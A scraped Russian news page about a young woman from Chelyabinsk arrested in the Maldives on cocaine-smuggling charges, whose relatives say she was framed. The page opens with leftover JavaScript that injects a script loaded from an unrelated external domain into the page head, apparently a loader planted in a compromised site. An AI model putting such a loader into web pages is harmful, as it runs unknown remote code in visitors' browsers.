, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Челябинскую девушку, отдыхавшую на Мальдивах, обвинили в контрабанде кокаина

25-летняя жительница Челябинска Ангелина Пуртова, отдыхавшая на Мальдивских островах, арестована местными властями по обвинению в перевозке двух килограммов кокаина. Родные и близкие девушки уверены, что ее подставили и собирают деньги на квалифицированных адвокатов.

В Челябинске Ангелина Пуртова работала визажистом. В новогодние каникулы она поехала отдыхать на Мальдивы, после чего перестала выходить на связь. Когда девушка, наконец, связалась с родными, она сообщила о том, что находиться в тюрьме. Оказалось, что она задержана за контрабанду кокаина. Родственники и друзья Ангелины считают, что ее подставили. Они уже организовали группу в социальной сети для сбора средств на оплату услуг юристов, которые смогут добиться экстрадиции девушки в Россию. К разрешению конфликтной ситуации также подключились Министерство иностранных дел Российской Федерации и Интерпол.

Новости
0 rating, 0 votes0 rating, 0 votes Запрещено!
Loading...Loading...
14:23 - 06 марта 2014
|
автор: U-RSS
|
(525)
|
(0)

Комментарии (0)

Я человек
Я бот